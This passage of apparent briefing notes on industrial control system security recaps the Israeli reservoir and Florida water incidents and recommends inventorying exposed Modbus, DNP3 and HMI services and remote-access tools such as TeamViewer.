  • This maps with OTORIO's report about the Israeli reservoir 'hack' in December. They concluded that the attackers likely 'did not possess any deep industrial capabilities or knowledge' and targeted the system solely because it was unprotected. 
  • Note: we called attacks on these devices 'annoying' but 'unlikely to be dangerous'. An attendee pointed out that a hacked fridge could be catastrophic for a hospital or pharmacy storing temperature-controlled medications.

  • Recommendation is network scanning and searching Shodan for modbus and dnp3, plus other common HMI ports and protocols. 
 
TeamViewer and remote access security
  • In light of the Florida water incident, they added some points about securing remote access/support tools. Nothing too exciting, just 'figure out what tools are in use at your organization' and 'maybe try to secure them?' 
  • Apparently there will be a more detailed brief on this incident later.
